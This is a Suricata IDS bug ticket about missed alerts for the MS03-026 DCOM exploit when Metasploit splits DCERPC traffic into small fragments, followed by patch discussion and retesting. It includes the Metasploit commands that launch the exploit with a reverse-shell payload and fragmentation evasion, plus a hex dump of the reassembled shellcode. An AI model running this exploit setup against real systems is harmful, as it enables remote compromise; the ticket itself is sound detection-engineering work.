Bug #206
closedMissed detection when dealing with fragmented RPC traffic (ms03-026)
Description
The attached pcap is generated from metasploit for ms03-026. We seem to alert properly for all available evasion techniques in metasploit except for the use of rpc frags. Setting the following we only alert on the cmd banner post exploitation.
use exploit/windows/dcerpc/ms03_026_dcom
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.78.254
set RHOST 192.168.78.21
set DCERPC::ReadTimeout 65535
set DCERPC::max_frag_size 20
exploit
src/suricata -s ../current-all-blah-newer.rules -l ./ -c suricata.yaml -r ms03_026_dcom-max_frag_size.pcap
exploitation is successful and we get..
07/07/10-20:30:26.609011 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]
we should see..
07/07/10-20:35:03.679795 [**] [1:3409:7] NETBIOS DCERPC NCACN-IP-TCP IActivation remoteactivation overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://www.securityfocus.com/bid/8205][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0352][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0715][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx]
07/07/10-20:35:03.679795 [**] [1:2002908:4] ET EXPLOIT x86 JmpCallAdditive Encoder [**] [Classification: Executable code was detected] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://doc.emergingthreats.net/bin/view/Main/2002908][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders]
07/07/10-20:35:03.791672 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]
Files
Updated by Kirby Kuehl almost 14 years ago
Will, can you try this again with the patch contained in Bug ID #200.
Updated by Will Metcalf almost 14 years ago
Still missing detection for this one.
Updated by Kirby Kuehl over 13 years ago
- File 0001-fix-multiple-dcerpc-fragments-in-one-packet.patch 0001-fix-multiple-dcerpc-fragments-in-one-packet.patch added
- % Done changed from 0 to 50
This patch fixes handling multiple DCERPC fragments within a single packet.
When dumping the UUID and the fully assembled DCERPC fragment, everything looks the same as the fully reassembled packet shown in frame 14 of this ticket's pcap. The attached patch is critical.
Updated by Kirby Kuehl over 13 years ago
The alert:
sid:3409 in VRT rules
The UUID suricata decodes:
BIND UUID [ 0] Accepted 4d9f4ab87d1c11cf861e0020af6e7c57 Major Version 0x0000 Minor Version 0x0000
The opnum suricata decodes:
Opnum 0x00
The fully reassembled stubdata:
[0000] 05 00 01 00 00 00 00 00 00 00 00 00 C4 5E 74 E5 ........ ......t. [0010] D8 56 3D 46 D4 64 88 E1 8E 3F 4E AC 00 00 00 00 .V.F.d.. ..N..... [0020] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ [0030] 34 A6 AB 12 FD 02 00 00 00 00 00 00 FD 02 00 00 4....... ........ [0040] 5C 00 5C 00 0B F9 43 49 34 3F 1D 0C 4E 67 25 91 ......CI 4...Ng.. [0050] BA BB B4 05 4F 47 66 35 B7 BE 98 BF 7D 04 2C 9F ....OGf5 ........ [0060] B3 D4 32 FC EB 10 EB 19 C6 16 00 01 23 37 F3 77 ..2..... .....7.w [0070] EB E0 FD 7F 15 79 04 BB 90 71 27 91 9B BE 09 F8 .....y.. .q...... [0080] 9F 46 4B 99 D5 7E 14 2A E1 39 EB 35 B6 B0 98 B5 .FK..... .9.5.... [0090] 3B FD F5 4A 4F 05 7F 1D B4 A8 43 A9 42 BB 03 D4 ...JO... ..C.B... [00a0] 49 80 FC B3 B8 93 BA 04 4E 7C 19 F9 3D 40 66 41 I....... N.....fA [00b0] 3C B1 3A E2 15 0C B7 34 25 47 1C 8D 96 BF 67 97 .......4 .G....g. [00c0] 92 37 B9 2D 90 48 24 B2 2C 33 D6 3F EB 04 51 F4 .7...H.. .3....Q. [00d0] 25 AD 4E EB 04 9F 4B FD A8 96 EB 04 EB 04 97 96 ..N...K. ........ [00e0] 1C 47 EB 04 B8 D7 25 46 97 71 05 88 E1 41 A8 78 .G.....F .q...A.x [00f0] 47 33 F5 7F 2C 98 49 14 B6 40 89 E3 7B 39 F6 D1 G3....I. .....9.. [0100] E0 41 79 72 02 EB 35 B1 B4 3D 8D 86 D6 7E 20 E1 .Ayr..5. ........ [0110] 77 7C 25 28 D4 B0 3F A8 75 47 B5 0B F5 7A 6B F9 w....... uG...zk. [0120] 98 10 F8 93 BF 4F 71 3C B6 03 D5 92 B3 B7 04 74 .....Oq. .......t [0130] 2C 9F 66 46 73 05 34 80 FD 22 FC B8 99 1C 37 2D ..fFs.4. ......7. [0140] 7F 15 0C 70 1D 4A 4B 96 A9 7D 43 B2 BA 76 78 4E ...p.JK. ..C..vxN [0150] B9 BE BB 84 E2 42 90 91 14 40 48 67 97 49 9B 24 .....B.. ..Hg.I.. [0160] 74 79 75 73 21 E1 27 BA 27 B2 91 7C 4B 2D BB B9 tyus.... ....K... [0170] A8 05 1C 37 81 FE C1 EB 3F 66 47 1D 04 2B F5 93 ...7.... .fG..... [0180] 70 69 FC B8 96 08 FD 41 98 B5 25 01 F9 48 0C 3D pi.....A .....H.. [0190] 78 3C 77 0B D4 7A 46 34 B0 B1 BE 33 D6 8D 86 E2 x.w..zF4 ...3.... [01a0] 42 39 E3 72 49 7F 35 4F 4E A9 2C 76 7E 15 9B B7 B9.rI.5O N..v.... [01b0] 12 F8 92 67 B4 B6 9F 24 99 BF 43 B3 4A 97 71 40 ...g.... ..C.J.q. [01c0] 90 7D 7B 2B D1 E0 14 66 23 D5 76 7F 7B 43 A9 15 .......f ..v..C.. [01d0] A8 7E 4A 73 1D B3 31 E2 7A 4B 99 77 22 F5 3C 7C ..Js..1. zK.w.... [01e0] 46 B2 71 41 09 F8 2D 97 74 38 D6 BF B7 78 29 EB F.qA.... t8...x.. [01f0] 42 70 30 E0 27 72 18 E1 47 96 37 3D BA 49 4F B9 Bp0..r.. G.7..IO. [0200] B5 91 98 25 1C 48 21 F6 D5 8D 40 34 B6 67 2C BB .....H.. ...4.g.. [0210] 75 24 BE 93 4E B0 3A D4 92 90 19 E3 3B FD B4 0C u...N... ........ [0220] 9F 04 B8 B1 83 D3 D0 FC 7D 35 3F 14 79 05 9B 87 ........ .5..y... [0230] F9 4E 70 71 7D 79 01 D6 89 EB 27 BE A9 97 BA 11 .Npq.y.. ........ [0240] E3 6B D4 8C E2 73 43 B4 84 E1 72 7F 41 7C 76 74 .k...sC. ..r.A.vt [0250] 32 D5 1C 05 A8 14 B6 35 92 25 0C B1 B5 B9 9B 40 2......5 ........ [0260] 9F 78 48 98 47 2A F5 66 BB 10 F9 81 E0 04 1B F8 .xH.G..f ........ [0270] 2D 75 7E 77 46 BF 7A 4F 7B 34 37 96 3D 4B 7E 13 .u.wF.zO .47..K.. [0280] F7 E0 77 2C 93 B3 88 FC 7D 3C 78 28 E2 08 E1 02 ..w..... ..x..... [0290] EB 15 76 03 D2 E3 4A 91 99 B7 7C 24 90 67 B2 85 ..v...J. .....g.. [02a0] FD B0 75 3F 71 65 72 4D 4A 79 77 76 69 72 66 50 ..u.qerM JywvirfP [02b0] 4B 75 4B 66 34 61 34 6C 77 31 4C 6C 43 31 39 63 KuKf4a4l w1LlC19c [02c0] 6A 4D 66 4B 78 52 51 58 4E 47 76 66 75 55 45 4C jMfKxRQX NGvfuUEL [02d0] 4F 33 6D 4F 4D 6E 30 49 61 70 7A 4A 46 41 61 45 O3mOMn0I apzJFAaE [02e0] 67 58 72 33 6F 57 6D 63 6B 58 30 6B 45 78 76 30 gXr3oWmc kX0kExv0 [02f0] 6B 53 73 59 6E 52 39 4E 4C 43 74 59 65 4E 6D 7A kSsYnR9N LCtYeNmz [0300] 4E 4A 49 6E 37 57 46 78 42 70 4D 75 63 32 45 56 NJIn7WFx BpMuc2EV [0310] 44 64 41 4E 41 71 6A 5A 74 4B 48 77 52 71 7A 53 DdANAqjZ tKHwRqzS [0320] 5A 69 30 6A 36 68 30 55 55 6D 51 6C 65 30 4A 44 Zi0j6h0U UmQle0JD [0330] 4A 4D 37 42 32 77 58 39 52 35 38 57 66 6B 6B 63 JM7B2wX9 R58Wfkkc [0340] 79 37 6A 57 52 61 59 73 46 6E 4D 7A 49 59 76 62 y7jWRaYs FnMzIYvb [0350] 49 41 4D 5A 37 32 65 6A 6D 56 69 73 72 50 61 76 IAMZ72ej mVisrPav [0360] 33 7A 4F 61 5A 59 4A 59 30 6D 32 35 34 63 45 4B 3zOaZYJY 0m254cEK [0370] 78 33 8B 45 30 05 24 FB FF FF FF E0 EB F4 64 64 x3.E0... ......dd [0380] 0B 0B 1B 00 56 78 49 72 61 66 45 32 46 37 44 68 ....VxIr afE2F7Dh [0390] 6D 79 72 47 32 61 66 35 55 78 65 73 34 50 4D 71 myrG2af5 Uxes4PMq [03a0] 31 69 33 49 45 71 78 43 62 4A 77 54 58 76 44 78 1i3IEqxC bJwTXvDx [03b0] 76 66 37 73 61 31 6F 57 EB 06 55 55 59 1C 00 01 vf7sa1oW ..UUY... [03c0] 8B 44 24 FC 05 E0 FA FF FF FF E0 33 74 33 4A 50 .D...... ...3t3JP [03d0] 6D 77 63 77 4F 4A 6F 49 46 45 54 4F 66 78 36 5A mwcwOJoI FETOfx6Z [03e0] 58 50 75 69 6D 4E 47 47 48 4C 31 67 72 76 5C 00 XPuimNGG HL1grv.. [03f0] 00 00 00 00 00 00 00 00 FF 6A C0 26 E7 72 F4 A0 ........ .j...r.. [0400] 01 00 00 00 54 F7 3E CD 01 00 00 00 94 5E 5A 50 ....T... ......ZP [0410] D0 86 24 28 37 75 B1 45 01 FF D7 8B 01 00 00 00 ....7u.E ........ [0420] 01 00 00 00 32 8B 60 C6 ....2...
Updated by Victor Julien over 13 years ago
Applied, thanks Kirby. What else needs to be done?
Updated by Victor Julien over 13 years ago
- % Done changed from 50 to 80
Current master alerts on 3409 and 2123. Sig 2002908 doesn't fire.
Updated by Victor Julien over 13 years ago
- Estimated time changed from 2.50 h to 12.50 h
Updated by Victor Julien over 13 years ago
- Due date changed from 07/10/2010 to 08/23/2010
- Target version changed from 1.0.1 to 1.0.2
- Estimated time changed from 12.50 h to 15.00 h
Reverted to the old code in git master as we found too many issues. Re-targeting to 1.0.2.
Updated by Victor Julien over 13 years ago
- Due date changed from 08/23/2010 to 09/15/2010
- Target version changed from 1.0.2 to 1.1beta1
Updated by Victor Julien over 13 years ago
- Status changed from New to Closed
- % Done changed from 80 to 100
Now getting:
07/07/10-20:30:26.365349 [**] [1:3409:7] NETBIOS DCERPC NCACN-IP-TCP IActivation remoteactivation overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 3] {TCP} 192.168.78.254:52952 -> 192.168.78.21:135
07/07/10-20:30:26.609011 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {TCP} 192.168.78.21:1040 -> 192.168.78.254:4444
Sid 2002908 doesn't match, but I think I shouldn't on this pcap. Btw, the alerts in the original report show a tcp session that is not present in the pcap: 192.168.78.254:47683 -> 192.168.78.21:135